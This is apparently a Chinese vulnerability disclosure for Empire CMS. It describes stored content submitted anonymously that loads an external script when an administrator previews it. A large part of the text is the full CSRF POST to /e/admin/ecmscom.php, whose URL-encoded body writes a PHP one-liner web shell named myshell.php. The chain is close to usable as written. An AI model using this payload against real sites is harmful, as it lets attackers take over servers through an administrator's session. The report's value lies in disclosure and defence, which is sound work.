漏洞作者: ../
帝国cms默认添加栏目时候默认是允许投稿。
另外帝国的会员中心基本都是开启的,有的就算不开启也是可以匿名投稿。
漏洞证明:
图1所示,帝国添加栏目时候默认是开启投稿的。
图2所示,虽然过滤的
也就是http://127.0.0.1/1.js,1.js代码看这里 WooYun: 帝国CMS CSRF GetShell
图3所示:管理员看到未审核内容时候点击标题可以查看内容。
图4所示:管理员查看预览稿件时候调用外部1.js,post /e/admin/ecmscom.phpenews=AddUserpage&id=&oldpath=page.html&cid=&gid=1&pagemod=1&title=aaa&path=page.html&classid=0&pagetitle=&pagekeywords=&pagedescription=&pagetext=%3C%3Fphp+file_put_contents%28%27myshell.php%27%2C%27%3C%3Fphp+%24_GET%5Bc%5D%28%24_POST%5Bx%5D%29%3B%3F%3E%27%29%3B%3F%3E&Submit=%E6%8F%90%E4%BA%A4
在/e/admin/目录生成myshell.php一句话。